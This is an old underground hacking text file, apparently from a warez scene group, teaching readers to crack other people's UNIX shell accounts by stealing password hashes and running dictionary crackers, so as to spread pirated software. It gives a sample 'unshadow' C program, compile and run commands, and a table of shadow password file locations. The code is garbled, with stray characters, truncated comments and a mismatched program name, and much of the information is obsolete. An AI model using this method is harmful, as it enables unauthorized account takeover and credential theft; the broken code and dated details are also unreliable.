|
|
+----------------------------------------------------------------------------+
¦ Author(s): ¦ Krypto ¦
+---------------+------------------------------------------------------------¦
¦ Subject: ¦ Cracking that "Passwd" File ¦
+----------------------------------------------------------------------------+
______________________________________________________________________________
______________________________________________________________________________
+----------------------------------------------------------------------------+
¦ R E A L I T Y C H E C K N E T W O R K! ¦
+----------------------------------------------------------------------------¦
¦____________________________________________________________________________¦
¦____________________________________________________________________________¦
+----------------------------------------------------------------------------¦
¦ ¦
¦ I'm not an amazing "3l33t3" hacker, but I have picked up some things ¦
¦ over the course of my scene life. ¦
¦ ¦
¦ At times, many of us are without Internet shell account, therefore ¦
¦ inhibiting our ablility to spread the warez. Many of us seek to remedy ¦
¦ this by cracking Internet shell accounts and doing as we please with ¦
¦ them, mainly spreading. Here, I'll show you the basic process in ¦
¦ cracking UNIX accounts so that you can better your efforts in spreading ¦
¦ them warez. ¦
¦ ¦
¦ Most Internet shells are UNIX based and therefore store the password ¦
¦ to all the users in a file called the "passwd" file. This is usually ¦
¦ located at /etc/passwd. The basic structure of the passwd file contains ¦
¦ lines looking like this: ¦
¦ ¦
¦ bgates:VKa0XuF8KB4sc:5604:12:William Gates:/home/bgates:/bin/bash ¦
¦ ¦
¦ Essentially, the line is broken down into these parts: ¦
¦ ¦
¦ Username: bgates ¦
¦ Encrypted Password: VKa0XuF8KB4sc ¦
¦ User number: 5604 ¦
¦ Group Number: 12 ¦
¦ Real Name (usually): William Gates ¦
¦ Home Directory: /home/bgates ¦
¦ Type of Shell: /bin/bash ¦
¦ ¦
¦ Your main concern is to crack each encrypted password for every ¦
¦ user. Because the encryption function is only unidirectional, you ¦
¦ cannot decrypt the encrypted password. You must run a cracking program ¦
¦ which encrypts words then compares the encrypted word with the password. ¦
¦ If they match you now have cracked the password. ¦
¦ ¦
¦ Because cracking relies on words that are encrypted, you MUST have a ¦
¦ wordlist. For beginners, a basic wordlist can be found as a dictionary ¦
¦ file supplied as a part of UNIX. The more the comprehensive the ¦
¦ wordlist is, the better your chances of successfully cracking passwords. ¦
¦ Next, you'll need a passwd cracker, which comes under numerous versions ¦
¦ depending on your operating system. Currently the best are: ¦
¦ ¦
¦ Software Operating System ¦
¦ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ¦
¦ CrackerJack v1.4 DOS ¦
¦ Crack UNIX ¦
¦ ¦
¦ Run the "cracking" program and feed your wordlist and passwd file ¦
¦ into the program. And watch as it "cracks" the passwords. ¦
¦ ¦
¦ Sometimes you'll discover that the passwd file is incomplete or ¦
¦ looks something like this: ¦
¦ ¦
¦ bgates:*:5604:12:William Gates:/home/bgates:/bin/bash ¦
¦ ¦
¦ The * is called the token and means that the passwd file has been ¦
¦ shadowed. Password shadowing is a security system where the encrypted ¦
¦ password field of /etc/passwd is replaced with a special token and the ¦
¦ encrypted password is stored in a separate file which is not readable by ¦
¦ normal system users. ¦
¦ ¦
¦ In order to defeat this, you'll need to write a C program and ¦
¦ compile it similar to this: ¦
¦ ¦
¦ Cut out the program at the bottom and save as "shadow.c" ¦
¦ ¦
¦ Run "gcc shadow.c -o shadow" or "cc shadow.c -o shadow" ¦
¦ ¦
¦ Run "./shadowpw >> password" ¦
¦ ¦
¦ "password" should be your deshadowed password list. ¦
¦ ¦
¦ If you have any problems, or need any help whatsoever... DO NOT ¦
¦ CONTACT ME! ¦
¦ ¦
+----------------------------------------------------------------------------¦
¦ ¦
¦ Sample Unshadow Program ¦
¦ ~~~~~~~~~~~~~~~~~~~~~~~ ¦
¦ ¦
¦ struct SHADOWPW { /* see getpwent(3) */ ¦
¦ char *pw_name; ¦
¦ char *pw_passwd; ¦
¦ int pw_uid; ¦
¦ int pw_gid; ¦
¦ int pw_quota; ¦
¦ char *pw_comment; ¦
¦ char *pw_gecos; ¦
¦ char *pw_dir; ¦
¦ char *pw_shell; ¦
¦ }; ¦
¦ struct passwd *getpwent(), *getpwuid(), *getpwnam(); ¦
¦ ¦
¦ #ifdef elxsis? ¦
¦ ¦
¦ /* Name of the shadow password file. Contains password and aging info * ¦
¦ ¦
¦ #define SHADOWPW "/etc/shadowpw" ¦
¦ #define SHADOWPW_PAG "/etc/shadowpw.pag" ¦
¦ #define SHADOWPW_DIR "/etc/shadowpw.dir" ¦
¦ /* ¦
¦ * Shadow password file pwd->pw_gecos field contains: ¦
¦ * ¦
¦ * <type>,<period>,<last_time>,<old_time>,<old_password> ¦
¦ * ¦
¦ * <type> = Type of password criteria to enforce (type int). ¦
¦ * BSD_CRIT (0), normal BSD. ¦
¦ * STR_CRIT (1), strong passwords. ¦
¦ * <period> = Password aging period (type long). ¦
¦ * 0, no aging. ¦
¦ * else, number of seconds in aging period. ¦
¦ * <last_time> = Time (seconds from epoch) of the last password ¦
¦ * change (type long). ¦
¦ * 0, never changed.n ¦
¦ * <old_time> = Time (seconds from epoch) that the current password ¦
¦ * was made the <old_password> (type long). ¦
¦ * 0, never changed.ewromsinm ¦
¦ * <old_password> = Password (encrypted) saved for an aging <period> t ¦
¦ * prevent reuse during that period (type char [20]). ¦
¦ * "*******", no <old_password>. ¦
¦ */ ¦
¦ ¦
¦ /* number of tries to change an aged password */ ¦
¦ ¦
¦ #define CHANGE_TRIES 3 ¦
¦ ¦
¦ /* program to execute to change passwords */ ¦
¦ ¦
¦ #define PASSWD_PROG "/bin/passwd" ¦
¦ ¦
¦ /* Name of the password aging exempt user names and max number of entir ¦
¦ ¦
¦ #define EXEMPTPW "/etc/exemptpw" ¦
¦ #define MAX_EXEMPT 100 ¦
¦ ¦
¦ ¦
¦ /* Password criteria to enforce */ ¦
¦ ¦
¦ #define BSD_CRIT 0 /* Normal BSD password criteria */ ¦
¦ #define STR_CRIT 1 /* Strong password criteria */ ¦
¦ #define MAX_CRIT 1 ¦
¦ #endif elxsi ¦
¦ #define NULL 0 ¦
¦ main() ¦
¦ { ¦
¦ struct passwd *p; ¦
¦ int i; ¦
¦ for (;1;) {; ¦
¦ p=getpwent(); ¦
¦ if (p==NULL) return; ¦
¦ printpw(p); ¦
¦ } ¦
¦ } ¦
¦ ¦
¦ printpw(a) ¦
¦ struct SHADOWPW *a; ¦
¦ { ¦
¦ printf("%s:%s:%d:%d:%s:%s:%s\n", ¦
¦ a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid, ¦
¦ a->pw_gecos,a->pw_dir,a->pw_shell); ¦
¦ } ¦
¦ ¦
¦ /* SunOS 5.0 /etc/shadow */ ¦
¦ /* SunOS4.1+c2 /etc/security/passwd.adjunct */ ¦
¦ ¦
+----------------------------------------------------------------------------¦
¦ ¦
¦ The passwd file is located in the following pathes for each system. ¦
¦ To determine your UNIX system type, enter the following during the UNIX ¦
¦ prompt: ¦
¦ ¦
¦ uname -a ¦
¦ ¦
¦ UNIX Paths (Courtesy of 2600) ¦
¦ ¦
¦ UNIX Path Token ¦
¦ ----------------------------------------------------------------- ¦
¦ AIX 3 /etc/security/passwd ! ¦
¦ or /tcb/auth/files/<first letter # ¦
¦ of username>/<username> ¦
¦ A/UX 3.0s /tcb/files/auth/?/* ¦
¦ BSD4.3-Reno /etc/master.passwd * ¦
¦ ConvexOS 10 /etc/shadpw * ¦
¦ ConvexOS 11 /etc/shadow * ¦
¦ DG/UX /etc/tcb/aa/user/ * ¦
¦ EP/IX /etc/shadow x ¦
¦ HP-UX /.secure/etc/passwd * ¦
¦ IRIX 5 /etc/shadow x ¦
¦ Linux 1.1 /etc/shadow * ¦
¦ OSF/1 /etc/passwd[.dir|.pag] * ¦
¦ SCO Unix #.2.x /tcb/auth/files/<first letter * ¦
¦ of username>/<username> ¦
¦ SunOS4.1+c2 /etc/security/passwd.adjunct ##username ¦
¦ SunOS 5.0 /etc/shadow ¦
¦ <optional NIS+ private secure maps/tables/whatever ¦
¦ System V Release 4.0 /etc/shadow x ¦
¦ System V Release 4.2 /etc/security/* database ¦
¦ Ultrix 4 /etc/auth[.dir|.pag] * ¦
¦ UNICOS /etc/udb * ¦
¦ ¦
¦ Well secure systems with shadowed passwords will cause a ¦
¦ segmentation fault once you've run that sample program. Remember, don't ¦
¦ come bugging me on IRC if your little hacking escapade doesn't turn out ¦
¦ like you wanted it to. Well, that's all for now, enjoy your newly ¦
¦ hacked UNIX accounts and spread them warez. ¦
¦ ¦
+----------------------------------------------------------------------------¦